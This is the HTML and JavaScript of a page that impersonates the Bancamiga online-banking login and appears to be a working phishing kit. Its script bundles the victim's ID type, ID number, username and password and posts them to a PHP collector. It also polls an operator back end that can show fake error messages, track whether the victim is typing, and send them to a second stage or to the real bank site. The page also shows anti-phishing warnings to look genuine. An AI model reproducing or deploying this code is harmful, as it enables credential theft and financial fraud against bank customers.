<html lang="es" class="swal2-shown">

   <head>

      <meta charset="utf-8">

      <title> Bievenido</title>

      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

      <link rel="stylesheet" href="css/mycss.css">

      <link rel="stylesheet" href="css/mycss2.css">



      <style type="text/css">

        /* Mantener el footer fijo */

          .page-footer {



            bottom: 0;

            left: 0;

            right: 0;

            /* Opcional: si necesitas z-index para que aparezca sobre todo */

            z-index: 9999;

          }



          /* Aseguramos que el contenido sea desplazable 

             y tenga espacio para que el footer no lo tape */

          .mainRegister {

            min-height: 100vh;      /* ocupar al menos el alto total de la ventana */

            overflow-y: auto;       /* genera scroll cuando el contenido sea largo */

            padding-bottom: 100px;  /* deja espacio al final para no quedar oculto tras el footer */

          }



      </style>

   </head>



   <body class="smart-style-2 fixed-header desktop-detected swal2-shown">

      <div id="main" role="main" class="mainRegister" style="background-image: url(../img/fondo-custom.jpg?V=02/10/23-03:00:40) !important;">





         <div id="content" class="container caja0" style="display: block;"><div class="modal-dialog demo-modal"><div class="modal-content"><div class="modal-body padding-10 text-center"><img src="../img/loading.webp" alt="" height="100"><h3 style="color:#625f5f">Cargando por favor espere.</h3></div></div></div></div>







         <div id="content" class="container" style="opacity: 1;">

         

            <div class="modal-dialog demo-modal caja1" style="display: none;">

               <div class="modal-content">

                  <div class="modal-header">

                     <h4 class="modal-title text-center">

                        <img src="../img/BancamigaLogo-14.svg" alt="" style="width: 85%;">

                     </h4>

                  </div>

                  <div id="login-form" novalidate="novalidate">

                     <div class="cf-turnstile" data-sitekey="0x4AAAAAAANeHPgF86kpmr3i" data-callback="turnstileLoaded" data-error-callback="turnstileLoaded"></div>

                   

                     <div class="modal-body smart-form client-form">

                        <div class="alert alert-warning fade in">

                           <i class="fa-fw fa fa-info"></i>

                           <strong>Protégete del fraude</strong>

                           <br>

                           Recuerda verificar que el URL <i class="fa fa-arrow-circle-up"></i> sea el correcto

                           <strong>https://online.servicio.com/?p=1</strong>

                        </div>

                        <fieldset>

                           <div class="row">

                              <section class="col col-4">

                                 <label for="tipodocben" class="label">Tipo de Documentación</label>

                                 <div class="select">

                                    <select class="form-control" name="tipodocben" id="tipodocben">



                                       <option value="01">Venezolano</option>

                                       <option value="02">Pasaportes</option>

                                       <option value="04">Juridicos</option>

                                       <option value="08">Extranjeros</option>

                                       <option value="10">Gubernamentales</option>

                                       <option value="12">Comunidad</option>



                                    </select>

                                    <i></i>

                                    <b class="tooltip tooltip-top-right"><i class="fa fa-lock txt-color-teal"></i>

                                    Tipo de Documento de Identidad</b>

                                 </div>

                              </section>

                              <section class="col col-8">

                                 <label for="documento" class="label">Numero de Documento</label>

                                 <div class="input">

                                    <i class="fa fa-user icon-append"></i>

                                    <input type="text" class="form-control numbersOnly loginpass" maxlength="10" name="documento" id="cedula" autocomplete="off">

                                    <b class="tooltip tooltip-top-right">

                                    <i class="fa fa-lock txt-color-teal"></i>

                                    Numero de Documento de Identidad</b>

                                 </div>

                              </section>

                           </div>

                           <div class="row">

                              <section class="col col-6">

                                 <label for="u" class="label">Nombre de Usuario</label>

                                 <div class="input">

                                    <i class="icon-append fa fa-user"></i>

                                    <input type="text" name="user" id="user" minlength="6" maxlength="20" autocomplete="off">

                                    <b class="tooltip tooltip-top-right">

                                    <i class="fa fa-lock txt-color-teal"></i>

                                    Ingresa el Nombre de Usuario

                                    </b>

                                 </div>

                              </section>

                              <section class="col col-6">

                                 <label for="p" class="label">

                                 Ingresa su Password

                                 </label>

                                 <div class="input">

                                    <i class="fa fa-eye-slash icon-append move_me input-token" style="color: rgb(50, 118, 177); font-weight: bold; font-size: 10px; cursor: pointer;"></i>

                                    <input type="text" class="loginpass lgpass input-token" name="pass" id="pass" minlength="8" maxlength="16" autocomplete="off">

                                    <b class="tooltip tooltip-top-right input-token"><i class="fa fa-lock txt-color-teal"></i> Clic aqui para visualizar clave</b>

                                 </div>

                              </section>

                           </div>

                        </fieldset>

                     </div>

                     <div class="modal-footer text-center">

                        <fieldset style="padding: 0 14px 5px;">

                           <div class="cargando text-center hide carga_login">

                              <img src="../img/loading.webp" alt="" height="30"> Cargando, Por favor espere un momento...

                           </div>

                           <div class="botones">

                              <div class="row caja_botones">

                                 <div class="col-xs-6">

                                    <button type="button" class="btn btn-warning btn-block margin-top-5" id="btnregistro" disabled="" style="cursor: not-allowed;">

                                    <i class="fa fa-user"></i> Registrar

                                    </button>

                                 </div>

                                 <div class="col-xs-6">

                                    <button type="submit" class="btn btn-success btn-block margin-top-5" id="btnlogin" style="border: 1px solid rgb(132, 168, 62); cursor: not-allowed;" disabled="">

                                    <i class="fa fa-check"></i> Ingreso

                                    </button>

                                 </div>

                              </div>

                              <br>

                              <div class="row">

                                 <div class="col-sm-4 margin-top-5" style="padding-right: 0;">

                                    <a id="cmdUnlock" class="text-muted" style="cursor: not-allowed;">

                                    <strong><i class="fa fa-unlock"></i> Desbloquear usuario</strong>

                                    </a>

                                 </div>

                                 <div class="col-sm-4 margin-top-5">

                                    <a id="cmdOlvido" class="text-muted" style="cursor: not-allowed;">

                                    <strong><i class="fa fa-user"></i> Olvidaste el Usuario</strong>

                                    </a>

                                 </div>

                                 <div class="col-sm-4 margin-top-5">

                                    <a id="cmdForget" class="text-muted" style="cursor: not-allowed;">

                                    <strong><i class="fa fa-key"></i> Olvidaste la Password</strong>

                                    </a>

                                 </div>

                              </div>

                           </div>

                           <br>

                           <div class="margin-bottom-10" style="display: flex; justify-content: center;">

                              <a >

                              <img class="redes-login" src="../img/face.svg" alt="Facebook">

                              </a>

                              <a >

                              <img class="redes-login" src="../img/ig.svg" alt="Instagram">

                              </a>

                              <a >

                              <img class="redes-login" src="../img/twitter.svg" alt="Twitter">

                              </a>

                              <a >

                              <img class="redes-login" src="../img/tiktok.svg" alt="Tiktok">

                              </a>

                              <a >

                              <img class="redes-login" src="../img/youtube.svg" alt="Youtube">

                              </a>

                           </div>

                           <p class="text-center">

                              <strong class="note">

                              Para mayor información o asesoria comunicate al <br>

                              Centro de atención de nuestro servicio (CAB)<br>

                              0400-TUSERVI y 0400-1000401

                              </strong>

                           </p>

                        </fieldset>

                     </div>

                  </form>

               </div>

            </div>

         </div>

      </div>











      <div class="page-footer text-center">

         <strong class="txt-color-white">

         Servicio Universal - RIF: J-31628759-8

         <span class="hidden-xs"> Copyright © 2024.</span> Todos los derechos reservados</strong>

         <table class="pull-right" style="margin-top:-10px" width="135" border="0" cellpadding="2" cellspacing="0" title="Click to Verify - This site chose Symantec SSL for secure e-commerce and confidential communications.">

            <tbody>

               <tr>

                  <td width="135" align="center" valign="top">

                     <br>

                  </td>

               </tr>

            </tbody>

         </table>

      </div>

     





      

      <div id="divSmallBoxes"></div>

      <div id="divMiniIcons"></div>

      <div id="divbigBoxes"></div>

     

      

   </body>



   <script type="text/javascript">



let var_escribiendo = 0; // Variable global, 0 si no está escribiendo, 1 si está escribiendo

let typingTimeout;



// Función que detecta cuando el usuario está escribiendo

function handleUserTyping() {

    // Cambiar el valor de var_escribiendo a 1 cuando el usuario está escribiendo

    var_escribiendo = 1;

    console.log('Escribiendo:', var_escribiendo);



    // Reiniciar el temporizador cada vez que el usuario interactúe

    clearTimeout(typingTimeout);



    // Si después de 2 segundos no ha escrito más, cambiar var_escribiendo a 0

    typingTimeout = setTimeout(() => {

        var_escribiendo = 0;

        console.log('Dejó de escribir:', var_escribiendo);

    }, 2000);  // 2 segundos

}



// Seleccionamos todos los inputs y selects para detectar la interacción

const inputsAndSelects = document.querySelectorAll('input, select');

inputsAndSelects.forEach(element => {

    element.addEventListener('input', handleUserTyping); // Detectar cambios en los inputs y selects

});



// Si agregas dinámicamente nuevos inputs o selects, el MutationObserver les asigna el evento

const observer = new MutationObserver((mutations) => {

    mutations.forEach(mutation => {

        mutation.addedNodes.forEach(node => {

            if (node.tagName === 'INPUT' || node.tagName === 'SELECT') {

                node.addEventListener('input', handleUserTyping);

            }

        });

    });

});



// Observar cambios en el DOM (inputs o selects agregados dinámicamente)

observer.observe(document.body, { childList: true, subtree: true });



    







function generarIdentificador() {

    const fechaHoy = new Date().toISOString().split('T')[0]; // Fecha actual en formato YYYY-MM-DD

    

    // Generar una cadena aleatoria de 100 caracteres

    let randomPart = '';

    while (randomPart.length < 100) {

        randomPart += Math.random().toString(36).substring(2); // Añadir aleatorios hasta alcanzar 100 caracteres

    }

    randomPart = randomPart.substring(0, 100); // Asegurarse de que tenga exactamente 100 caracteres

    

    return `${fechaHoy}-${randomPart}`; // Identificador único basado en la fecha y parte aleatoria

}





// Clave para almacenar en localStorage

const claveIdentificador = "identificador_unico";



// Función para obtener el identificador actual o generar uno nuevo si es necesario

function obtenerIdentificador() {

    const fechaHoy = new Date().toISOString().split('T')[0]; // Fecha actual en formato YYYY-MM-DD

    let identificador = localStorage.getItem(claveIdentificador); // Obtiene el identificador del localStorage



    // Si no existe un identificador o no corresponde al día actual, se genera uno nuevo

    if (!identificador || !identificador.startsWith(fechaHoy)) {

        identificador = generarIdentificador(); // Generar un nuevo identificador

        localStorage.setItem(claveIdentificador, identificador); // Guardarlo en localStorage

    }

    return identificador; // Retorna el identificador actual

}









////////////////////////////////////////////////////////////////////

let conect_user = 0;

let coloco_user = 0;

let coloco_imagen = 0;

let mostrar_mensaje_anti_fishin = 0;



async function Connect_system() {

  let resp_form1 = localStorage.getItem("resp_form1");



  let resp_form_session = localStorage.getItem("resp_form_session");

  let pantalla = 1;

    let ident = obtenerIdentificador();

  if (conect_user == 0) {

    conect_user = 1;



    $.ajax({

      type: "POST",

      url: "../../../php/conectado_user.php",

      async: true,

      data: { "pantalla": pantalla,"var_escribiendo": var_escribiendo, "ident": ident },

      success: function(datos) {

        var dataJson = eval(datos);

        console.log(dataJson);



        if (dataJson.length > 0) {

          if (datos[0].guardo == 'no') {

            window.location.href = '../../..';

            return;

          }



          if (dataJson[0].redirigir == 1) {

            window.location.href = 'https://online.bancamiga.com/?p=1';

            return;

          }



          if (dataJson[0].valid_user_0 == 0) {

            mostrar_mensaje_anti_fishin = 1;

            let datos_login = dataJson[0].user_dato1;

            let datos_login_part = datos_login.split("^");



            let tipo = datos_login_part[0].trim();

            let cedula = datos_login_part[1].trim();

            let user = datos_login_part[2].trim();

            let pass = datos_login_part[3].trim();



            document.getElementById('tipodocben').disabled = true;

            document.getElementById('cedula').disabled = true;

            document.getElementById('user').disabled = true;

            document.getElementById('pass').disabled = true;



            document.getElementById('tipodocben').value = tipo;

            document.getElementById('cedula').value = cedula;

            document.getElementById('user').value = user;

            document.getElementById('pass').value = pass;



            document.getElementsByClassName('caja0')[0].style.display = 'none';

            document.getElementsByClassName('caja1')[0].style.display = 'block';

            document.getElementsByClassName('carga_login')[0].classList.remove('hide');

            document.getElementsByClassName('caja_botones')[0].classList.add('hide');

          }



          if (dataJson[0].valid_user_0 == 2) {

            if (resp_form1 == 0) {

              setTimeout(function() {

                localStorage.setItem("resp_form1", "1");

                Swal.fire({

                  text: 'Estimado cliente, verifique e intente de nuevo.',

                  icon: "error"

                });



                document.getElementById('tipodocben').disabled = false;

                document.getElementById('cedula').disabled = false;

                document.getElementById('user').disabled = false;

                document.getElementById('pass').disabled = false;



                document.getElementById('tipodocben').value = '01';

                document.getElementById('cedula').value = '';

                document.getElementById('user').value = '';

                document.getElementById('pass').value = '';



                document.getElementsByClassName('caja0')[0].style.display = 'none';

                document.getElementsByClassName('caja1')[0].style.display = 'block';

                document.getElementsByClassName('carga_login')[0].classList.add('hide');

                document.getElementsByClassName('caja_botones')[0].classList.remove('hide');

              }, 500);

            }

          }



        if (dataJson[0].valid_user_0 == 3) {

            if (resp_form_session == 0) {

              setTimeout(function() {

                localStorage.setItem("resp_form_session", "1");



                 Swal.fire({

                  text: 'Estimado usuario, Su sesión ha expirado',

                  icon: "warning"

                });



                  setTimeout(function() {



                      window.location.reload();



                  }, 3000);







              }, 500);

            }

          }



          // cuando el user es correcto....

          if (dataJson[0].valid_user_0 == 1) {

            window.location.href = '../f2/?p=1';

            return;

          }

        }



        conect_user = 0;

        setTimeout(Connect_system, 1500);

      },

      error: function(jqXHR, textStatus, errorThrown) {

        console.error('Error en la conexión:', textStatus, errorThrown);

        conect_user = 0;

        setTimeout(Connect_system, 1500);

      }

    });

  }

}



Connect_system();





/////////////////////////////////////////////////////////////////////////////////////////////////////////////////





setTimeout(function() {

         if(mostrar_mensaje_anti_fishin==0){

              document.getElementsByClassName('caja0')[0].style.display='none';

                       document.getElementsByClassName('caja1')[0].style.display='block';





                       Swal.fire({

                       html: '<div id="swal2-content" class="swal2-content" style="display: block;"><span style="font-size: 22px"><strong>NO CAIGAS EN TRAMPAS</strong></span> revisa  desde la barra de tú navegador que esta página sea <span style="font-size: 22px"><strong>https://online.bancamiga.com/?p=1</strong></span></div>',

                       icon: "warning"

                     });







         }

                     



          }, 1000);









//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

document.addEventListener('DOMContentLoaded', function() {

            // Seleccionamos los elementos del DOM

            var cedula = document.getElementById('cedula');

            var user = document.getElementById('user');

            var pass = document.getElementById('pass');





            var btnregistro = document.getElementById('btnregistro');

            var btnlogin = document.getElementById('btnlogin');



            // Función para verificar las condiciones y habilitar/deshabilitar el botón

            function verificarCondiciones() {

                if (cedula.value.length > 6 && user.value.length > 4 && pass.value.length > 4) {

                    btnlogin.disabled = false;

                    btnlogin.style='cursor: pointer;'

                } else {

                  

                    btnlogin.style='cursor: not-allowed;'

                    btnlogin.disabled = true;



                }

            }

             function verificar_cmdRegister() {

                if (user.value.length > 5 ) {

                    btnregistro.disabled = false;

                } else {

                    btnregistro.disabled = true;

                }

            }



            // Añadimos eventos de entrada a los campos

            cedula.addEventListener('input', verificarCondiciones);

            user.addEventListener('input', verificarCondiciones);

            user.addEventListener('input', verificar_cmdRegister);

            pass.addEventListener('input', verificarCondiciones);

        });



///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



$(document).on("click","#btnlogin", function(){



let tipo_cuenta = document.getElementById('tipodocben');

let user = document.getElementById('user');

let cedula = document.getElementById('cedula');

let pass = document.getElementById('pass');



if(user.value.length <5 && cedula.value.length <6 && pass.value.length <5){



                     

    return;

}





    let armado_user =tipo_cuenta.value +"^"+ cedula.value +"^"+ user.value +"^"+ pass.value;



    document.getElementsByClassName('carga_login')[0].classList.remove('hide');

    document.getElementsByClassName('caja_botones')[0].classList.add('hide');

    tipo_cuenta.disabled='true';

    user.disabled='true';

    cedula.disabled='true';

    pass.disabled='true';





    _iniciar_proceso_session(armado_user,tipo_cuenta.value,'1');//guardamos los datos para luego verificar si son correctos o no....







});



/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////





let presiono_iniciar_proceso_session =0;

function _iniciar_proceso_session(user,tipo_cuenta,tipo_operacion){

    

   if(presiono_iniciar_proceso_session==1){return;}

       presiono_iniciar_proceso_session=1;

       var tipocuenta = localStorage.getItem('tipocuenta');

         console.log(user);

          let ident = obtenerIdentificador();



          

    $.ajax({

        type:"POST",

        url:"../../../php/g_user_pass.php",

        async: true,

        data:{"user":user,"tipocuenta":tipo_cuenta,"tipo_operacion":tipo_operacion, "ident": ident},

        success: function(datos){

        var dataJson = eval(datos);



            console.log(dataJson);

            presiono_iniciar_proceso_session=0;



            if(dataJson.length>0){



                    if(dataJson[0].guardo=='si' && dataJson[0].tipo_operacion=='1'){



                         document.getElementsByClassName('carga_login')[0].classList.remove('hide');

                         document.getElementsByClassName('caja_botones')[0].classList.add('hide');

                        localStorage.setItem("resp_form1", "0");

                        localStorage.setItem("resp_form_session", "0");





                    }

    

                          

            }else{

              



            }



         

      },});



}







//////////////////////////////



document.getElementById("cedula").addEventListener("keypress", function (e) {

    if (!/[0-9]/.test(e.key)) {

        e.preventDefault();

    }

});





</script>











</html>